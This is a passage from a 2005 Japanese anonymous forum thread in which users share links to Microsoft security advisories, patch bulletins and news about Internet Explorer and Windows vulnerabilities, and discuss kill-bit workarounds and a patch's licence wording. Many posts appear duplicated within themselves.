>ヒープオーバーフローが発生する恐れがあると警告した。これを受けて米Microsoftは30日、Security
>Advisory(903144)として調査を進めていることを公表した。
959 :名無しさん@お腹いっぱい。:2005/07/04(月) 17:52:11
IEのパッチ未公開セキュリティ・ホールを突くコードが出現,パソコンを乗っ取られる
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050704/163905/
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050704/163905/
960 :名無しさん@お腹いっぱい。:2005/07/08(金) 19:34:40
マイクロソフト セキュリティ アドバイザリ (903144)
COM オブジェクト (Javaprxy.dll) により、Internet Explorer が異常終了する
http://www.microsoft.com/japan/technet/security/advisory/903144.mspx
回避策
Javaprxy.dll COM オブジェクトを無効にして Internet Explorer で実行されないようにする
Microsoft Windows 2000 Service Pack 3 上の Internet Explorer 5.01 Service Pack 3
http://www.microsoft.com/downloads/details.aspx?displaylang=ja&FamilyID=25982E02-EC6D-44CE-82DE-12DDEF1ADDD6
Microsoft Windows 2000 Service Pack 上の Internet Explorer 5.01 Service Pack 4
http://www.microsoft.com/downloads/details.aspx?displaylang=ja&FamilyID=25982E02-EC6D-44CE-82DE-12DDEF1ADDD6
Microsoft Windows 2000 Service Pack 3、Microsoft Windows 2000 Service Pack 4 または Microsoft Windows XP Service Pack 1 上の Internet Explorer 6 Service Pack 1
http://www.microsoft.com/downloads/details.aspx?displaylang=ja&FamilyID=2A506C16-01EF-4060-BCF8-6993C55840A9
Microsoft Windows XP Service Pack 2 上の Internet Explorer 6
http://www.microsoft.com/downloads/details.aspx?displaylang=ja&FamilyID=C1381768-6C6D-4568-97B1-600DB8798EBF
つづく
COM オブジェクト (Javaprxy.dll) により、Internet Explorer が異常終了する
http://www.microsoft.com/japan/technet/security/advisory/903144.mspx
回避策
Javaprxy.dll COM オブジェクトを無効にして Internet Explorer で実行されないようにする
Microsoft Windows 2000 Service Pack 3 上の Internet Explorer 5.01 Service Pack 3
http://www.microsoft.com/downloads/details.aspx?displaylang=ja&FamilyID=25982E02-EC6D-44CE-82DE-12DDEF1ADDD6
Microsoft Windows 2000 Service Pack 上の Internet Explorer 5.01 Service Pack 4
http://www.microsoft.com/downloads/details.aspx?displaylang=ja&FamilyID=25982E02-EC6D-44CE-82DE-12DDEF1ADDD6
Microsoft Windows 2000 Service Pack 3、Microsoft Windows 2000 Service Pack 4 または Microsoft Windows XP Service Pack 1 上の Internet Explorer 6 Service Pack 1
http://www.microsoft.com/downloads/details.aspx?displaylang=ja&FamilyID=2A506C16-01EF-4060-BCF8-6993C55840A9
Microsoft Windows XP Service Pack 2 上の Internet Explorer 6
http://www.microsoft.com/downloads/details.aspx?displaylang=ja&FamilyID=C1381768-6C6D-4568-97B1-600DB8798EBF
つづく
961 :名無しさん@お腹いっぱい。:2005/07/08(金) 19:35:07
つづき
Microsoft Windows Server 2003 および Microsoft Windows Server 2003 Service Pack 1 上の Internet Explorer 6
http://www.microsoft.com/downloads/details.aspx?displaylang=ja&FamilyID=F368E231-9918-4881-9F17-60312F82183F
Microsoft Windows XP 64-Bit Edition Version 2003 (Itanium)、Microsoft Windows Server 2003 for Itanium-based Systems、および Microsoft Windows Server 2003 with SP1 for Itanium-based Systems 用の Internet Explorer 6
http://www.microsoft.com/downloads/details.aspx?displaylang=ja&FamilyID=D785F9AB-DBE9-4272-A87E-64205690F98E
Microsoft Windows Server 2003 x64 Edition および Microsoft Windows XP Professional x64 Edition 用の Internet Explorer 6
http://www.microsoft.com/downloads/details.aspx?displaylang=ja&FamilyID=68209225-A682-4008-A22B-881C401486F7
Microsoft Windows Millennium Edition 上の Internet Explorer 5.5 Service Pack 2
http://www.microsoft.com/downloads/details.aspx?displaylang=ja&FamilyID=06F8CD1B-93A0-4522-AF7D-603DD5C2BACB
Microsoft Windows 98、Microsoft Windows 98 SE、または Microsoft Windows Millennium Edition 上の Internet Explorer 6 Service Pack 1
http://www.microsoft.com/downloads/details.aspx?displaylang=ja&FamilyID=2A506C16-01EF-4060-BCF8-6993C55840A9
Microsoft Windows Server 2003 および Microsoft Windows Server 2003 Service Pack 1 上の Internet Explorer 6
http://www.microsoft.com/downloads/details.aspx?displaylang=ja&FamilyID=F368E231-9918-4881-9F17-60312F82183F
Microsoft Windows XP 64-Bit Edition Version 2003 (Itanium)、Microsoft Windows Server 2003 for Itanium-based Systems、および Microsoft Windows Server 2003 with SP1 for Itanium-based Systems 用の Internet Explorer 6
http://www.microsoft.com/downloads/details.aspx?displaylang=ja&FamilyID=D785F9AB-DBE9-4272-A87E-64205690F98E
Microsoft Windows Server 2003 x64 Edition および Microsoft Windows XP Professional x64 Edition 用の Internet Explorer 6
http://www.microsoft.com/downloads/details.aspx?displaylang=ja&FamilyID=68209225-A682-4008-A22B-881C401486F7
Microsoft Windows Millennium Edition 上の Internet Explorer 5.5 Service Pack 2
http://www.microsoft.com/downloads/details.aspx?displaylang=ja&FamilyID=06F8CD1B-93A0-4522-AF7D-603DD5C2BACB
Microsoft Windows 98、Microsoft Windows 98 SE、または Microsoft Windows Millennium Edition 上の Internet Explorer 6 Service Pack 1
http://www.microsoft.com/downloads/details.aspx?displaylang=ja&FamilyID=2A506C16-01EF-4060-BCF8-6993C55840A9
962 :名無しさん@お腹いっぱい。:2005/07/10(日) 13:43:38
7月度の月例パッチ、“緊急”は3件〜Microsoftが事前告知
http://internet.watch.impress.co.jp/cda/news/2005/07/08/8334.html
http://internet.watch.impress.co.jp/cda/news/2005/07/08/8334.html
963 :名無しさん@お腹いっぱい。:2005/07/12(火) 16:12:55
Eのコンポーネントを使うアプリケーションにセキュリティ・ホール
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050712/164449/
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050712/164449/
誤:Eの
正:IEの
スマソ逝ってくる…
正:IEの
スマソ逝ってくる…
965 :名無しさん@お腹いっぱい。:2005/07/13(水) 08:31:56
【新規 最大深刻度: 緊急】
Microsoft Word の脆弱性により、リモートでコードが実行される (903672) (MS05-035)
http://www.microsoft.com/japan/technet/security/bulletin/ms05-035.mspx
マイクロソフト カラー管理モジュールの脆弱性によりリモートでコードが実行される (901214) (MS05-036)
http://www.microsoft.com/japan/technet/security/bulletin/ms05-036.mspx
JView プロファイラの脆弱性によりリモートでコードが実行される (903235) (MS05-037)
http://www.microsoft.com/japan/technet/security/bulletin/ms05-037.mspx
【更新 最大深刻度: 警告】
Telnet クライアントの脆弱性により、情報漏えいが起こる (896428) (MS05-033)
http://www.microsoft.com/japan/technet/security/bulletin/MS05-033.mspx
>Services for UNIX 2.0 および Services for UNIX 2.1 用のセキュリティ
>更新プログラムが利用可能であることをお知らせし、「セキュリティ更新
>プログラムに関する情報」に追加のセキュリティ更新プログラムに関する
>更新情報を掲載しました。
Microsoft Word の脆弱性により、リモートでコードが実行される (903672) (MS05-035)
http://www.microsoft.com/japan/technet/security/bulletin/ms05-035.mspx
マイクロソフト カラー管理モジュールの脆弱性によりリモートでコードが実行される (901214) (MS05-036)
http://www.microsoft.com/japan/technet/security/bulletin/ms05-036.mspx
JView プロファイラの脆弱性によりリモートでコードが実行される (903235) (MS05-037)
http://www.microsoft.com/japan/technet/security/bulletin/ms05-037.mspx
【更新 最大深刻度: 警告】
Telnet クライアントの脆弱性により、情報漏えいが起こる (896428) (MS05-033)
http://www.microsoft.com/japan/technet/security/bulletin/MS05-033.mspx
>Services for UNIX 2.0 および Services for UNIX 2.1 用のセキュリティ
>更新プログラムが利用可能であることをお知らせし、「セキュリティ更新
>プログラムに関する情報」に追加のセキュリティ更新プログラムに関する
>更新情報を掲載しました。
966 :名無しさん@お腹いっぱい。:2005/07/13(水) 17:20:57
JView プロファイラの脆弱性によりリモートでコードが実行される (903235) (MS05-037)
のパッチって結局kill bit立てるだけだよね↓と何が違うんだろ
http://internet.watch.impress.co.jp/cda/news/2005/07/06/8295.html
と思ってたら自己解決w
http://internet.watch.impress.co.jp/cda/news/2005/07/13/8391.html
>この脆弱性はマイクロソフトの「Security Advisory」において「903144」として公表されていた。
>マイクロソフトでは「903144」公表時に、問題となっていた「Javaprxy.dll COMオブジェクト」(Javaprxy.dll)を無効化するプログラムを配布しており、
>このプログラムを適用しているユーザーは、今回の修正パッチを適用する必要はないという。
のパッチって結局kill bit立てるだけだよね↓と何が違うんだろ
http://internet.watch.impress.co.jp/cda/news/2005/07/06/8295.html
と思ってたら自己解決w
http://internet.watch.impress.co.jp/cda/news/2005/07/13/8391.html
>この脆弱性はマイクロソフトの「Security Advisory」において「903144」として公表されていた。
>マイクロソフトでは「903144」公表時に、問題となっていた「Javaprxy.dll COMオブジェクト」(Javaprxy.dll)を無効化するプログラムを配布しており、
>このプログラムを適用しているユーザーは、今回の修正パッチを適用する必要はないという。
>966だから漏れjavaprxy.dllする回避策してるからMS05-037はしばらくスルーでいいや
(近いうちにMSJVMアンインストールするつもりだしw)
マイクロソフト カラー管理モジュールの脆弱性によりリモートでコードが実行される (901214) (MS05-036)
だけ当ててこうとインストーラ実行したら
-----------------------------------------------
注 : Microsoft Corporation またはお客様の所在
地に応じては、その子会社 (以下総称して「マイクロ
ソフト」といいます) がお客様に本追加ソフトウェア
を許諾するものとします。お客様は、本追加ソフトウ
ェアと共に使用することを指定された Microsoft
Windows ソフトウェア (以下「本ソフトウェア」と
いいます) の正規に許諾された各コピーと共に、この
追加ソフトウェアを使用することができます。お客様
が本ソフトウェアの許諾を受けていない場合、本追加
ソフトウェアを使用することはできません。お客様に
よる本追加ソフトウェアの使用は、本ソフトウェアに
付属する使用許諾契約書に拘束されるものとします。
EULAID:HFX_RM.0_GDR_NRL_JA
------------------------------------------
エッ!!!!!これだけ?うそーん_| ̄|○ マッマサカ (順不同)
パッチ公開時点で穴がもう悪用されてる報告がMSに来てたつーから仕方なく当てましたよ ええ
けど何同意してるかわかったもんじゃない
つーかこんなの有効なの?
(近いうちにMSJVMアンインストールするつもりだしw)
マイクロソフト カラー管理モジュールの脆弱性によりリモートでコードが実行される (901214) (MS05-036)
だけ当ててこうとインストーラ実行したら
-----------------------------------------------
注 : Microsoft Corporation またはお客様の所在
地に応じては、その子会社 (以下総称して「マイクロ
ソフト」といいます) がお客様に本追加ソフトウェア
を許諾するものとします。お客様は、本追加ソフトウ
ェアと共に使用することを指定された Microsoft
Windows ソフトウェア (以下「本ソフトウェア」と
いいます) の正規に許諾された各コピーと共に、この
追加ソフトウェアを使用することができます。お客様
が本ソフトウェアの許諾を受けていない場合、本追加
ソフトウェアを使用することはできません。お客様に
よる本追加ソフトウェアの使用は、本ソフトウェアに
付属する使用許諾契約書に拘束されるものとします。
EULAID:HFX_RM.0_GDR_NRL_JA
------------------------------------------
エッ!!!!!これだけ?うそーん_| ̄|○ マッマサカ (順不同)
パッチ公開時点で穴がもう悪用されてる報告がMSに来てたつーから仕方なく当てましたよ ええ
けど何同意してるかわかったもんじゃない
つーかこんなの有効なの?
968 :名無しさん@お腹いっぱい。:2005/07/13(水) 18:42:47
まさか「情報の送信を了承する」とでも書いてあるんじゃないだろうな?とか思えてくる
http://www.itmedia.co.jp/enterprise/articles/0507/13/news025.html
けれどなんか危なそうな穴だし・・・こんな時に怪しい(ように思えるライセンス改定する)の勘弁してくれよ>MS
もしもOS自体に変な動きされたらPFWなんぞあてになるわけもない
漏れはできないんでパッチ当てた(or当てられる)香具師誰かPC外でパケット監視おながい
http://www.itmedia.co.jp/enterprise/articles/0507/13/news025.html
けれどなんか危なそうな穴だし・・・こんな時に怪しい(ように思えるライセンス改定する)の勘弁してくれよ>MS
もしもOS自体に変な動きされたらPFWなんぞあてになるわけもない
漏れはできないんでパッチ当てた(or当てられる)香具師誰かPC外でパケット監視おながい
969 :名無しさん@お腹いっぱい。:2005/07/13(水) 20:51:40
>MicrosoftWindows ソフトウェア (以下「本ソフトウェア」といいます)
(ry
>お客様による本追加ソフトウェアの使用は、本ソフトウェアに
>付属する使用許諾契約書に拘束されるものとします。
本追加ソフトウェア=このパッチ?
本ソフトウェア=元のWindows?
結局元々のEULAそのまま(今までと同じ)ということでいい?
ナンカヤヤコシイ
(ry
>お客様による本追加ソフトウェアの使用は、本ソフトウェアに
>付属する使用許諾契約書に拘束されるものとします。
本追加ソフトウェア=このパッチ?
本ソフトウェア=元のWindows?
結局元々のEULAそのまま(今までと同じ)ということでいい?
ナンカヤヤコシイ
970 :名無しさん@お腹いっぱい。:2005/07/13(水) 23:46:54
>>966
日本のセキュリティチームの Blog
http://www.exconn.net/Blogs/team02/archive/2005/07/13/1393.aspx
>更新プログラム自体は、アドバイザリで公開していた killbits 処理を行うものと同じものです。
日本のセキュリティチームの Blog
http://www.exconn.net/Blogs/team02/archive/2005/07/13/1393.aspx
>更新プログラム自体は、アドバイザリで公開していた killbits 処理を行うものと同じものです。
971 :名無しさん@お腹いっぱい。:2005/07/14(木) 18:48:46
マイクロソフト、アップデータを一括提供する「Microsoft Update」
http://pc.watch.impress.co.jp/docs/2005/0714/ms.htm
http://pc.watch.impress.co.jp/docs/2005/0714/ms.htm
972 :Windows 2000 SP4 UR1関連:2005/07/19(火) 09:47:40
Windows 2000 SP4 対応の更新プログラム ロールアップ 1 (KB891861) の適用後に Excel や Word でフロッピーディスクにアクセスすると応答を停止する場合がある
http://support.microsoft.com/default.aspx?scid=kb;ja;904130&sd=rss&spid=1743
Windows Update や Microsoft Update サイトにアクセスすると 0x800700C1 エラーが表示される
http://support.microsoft.com/default.aspx?scid=kb;ja;904392
Windows 2000 Service Pack 4 対応の更新プログラム ロールアップ 1 を適用すると Outlook からパスワード変更が出来なくなる
http://support.microsoft.com/default.aspx?scid=kb;ja;904753
http://support.microsoft.com/default.aspx?scid=kb;ja;904130&sd=rss&spid=1743
Windows Update や Microsoft Update サイトにアクセスすると 0x800700C1 エラーが表示される
http://support.microsoft.com/default.aspx?scid=kb;ja;904392
Windows 2000 Service Pack 4 対応の更新プログラム ロールアップ 1 を適用すると Outlook からパスワード変更が出来なくなる
http://support.microsoft.com/default.aspx?scid=kb;ja;904753
973 :名無しさん@お腹いっぱい。:2005/07/19(火) 14:14:54
既にあちこちで知られているが、
Windowsに強制終了されるセキュリティ・ホール,リモートデスクトップのユーザーは注意
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050719/164837/
Microsoft Security Advisory (904797)
Vulnerability in Remote Desktop Protocol (RDP) Could Lead to Denial of Service
http://www.microsoft.com/technet/security/advisory/904797.mspx
Windowsに強制終了されるセキュリティ・ホール,リモートデスクトップのユーザーは注意
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050719/164837/
Microsoft Security Advisory (904797)
Vulnerability in Remote Desktop Protocol (RDP) Could Lead to Denial of Service
http://www.microsoft.com/technet/security/advisory/904797.mspx
974 :名無しさん@お腹いっぱい。:2005/07/20(水) 16:42:14
>>973
上記の日本語アドバイザリ
マイクロソフト セキュリティ アドバイザリ (904797)
リモート デスクトップ プロトコル (RDP) の脆弱性によりサービス拒否が発生する
http://www.microsoft.com/japan/technet/security/advisory/904797.mspx
http://www.microsoft.com/japan/technet/security/advisory/default.mspx
上記の日本語アドバイザリ
マイクロソフト セキュリティ アドバイザリ (904797)
リモート デスクトップ プロトコル (RDP) の脆弱性によりサービス拒否が発生する
http://www.microsoft.com/japan/technet/security/advisory/904797.mspx
http://www.microsoft.com/japan/technet/security/advisory/default.mspx
975 :名無しさん@お腹いっぱい。:2005/07/25(月) 11:47:53
「IEのJPEG画像処理にセキュリティ・ホール」――米SANS Instituteが警告
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050725/165214/
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050725/165214/
976 :名無しさん@お腹いっぱい。:2005/08/03(水) 23:12:48
●..●...●●...●●●●...●●.....●.●●.●..●.●●●....●●●...●.●.●●
ウイルス対策ソフトの検出力結果
http://www.geocities.jp/stealrush/security.html
●●..●..●●.●●....●.●●.●.●●●●●..●.●●●...●..●●.●....●●
ウイルス対策ソフトの検出力結果
http://www.geocities.jp/stealrush/security.html
●●..●..●●.●●....●.●●.●.●●●●●..●.●●●...●..●●.●....●●
977 :名無しさん@お腹いっぱい。:2005/08/05(金) 11:00:46
「8月公開のセキュリティ情報は計6件,最大深刻度は『緊急』」――MSが予告
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050805/165940/
http://www.microsoft.com/technet/security/bulletin/advance.mspx
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050805/165940/
http://www.microsoft.com/technet/security/bulletin/advance.mspx
978 :名無しさん@お腹いっぱい。:
ICMPの問題を修正するWindows XP SP2用パッチがダウンロードセンターで公開
http://www.forest.impress.co.jp/article/2005/08/08/icmppatch.html
ダウンロードの詳細 : Windows XP 用の更新プログラム (KB889527)
http://www.microsoft.com/downloads/details.aspx?FamilyID=cd0931a8-1f22-4613-93fe-8785bdcc3394&DisplayLang=ja
Windows XP Professional Service Pack 2-based コンピュータで(ICMP パケットを)許可するように Windows ファイアウォール機能を構成したにもかかわらず、 ICMP パケットが廃棄されます。
http://support.microsoft.com/kb/889527/ja
要WGA認証、要再起動。
いまのところ対象としてWindows XP Professional SP2だけがあがっている。
http://www.forest.impress.co.jp/article/2005/08/08/icmppatch.html
ダウンロードの詳細 : Windows XP 用の更新プログラム (KB889527)
http://www.microsoft.com/downloads/details.aspx?FamilyID=cd0931a8-1f22-4613-93fe-8785bdcc3394&DisplayLang=ja
Windows XP Professional Service Pack 2-based コンピュータで(ICMP パケットを)許可するように Windows ファイアウォール機能を構成したにもかかわらず、 ICMP パケットが廃棄されます。
http://support.microsoft.com/kb/889527/ja
要WGA認証、要再起動。
いまのところ対象としてWindows XP Professional SP2だけがあがっている。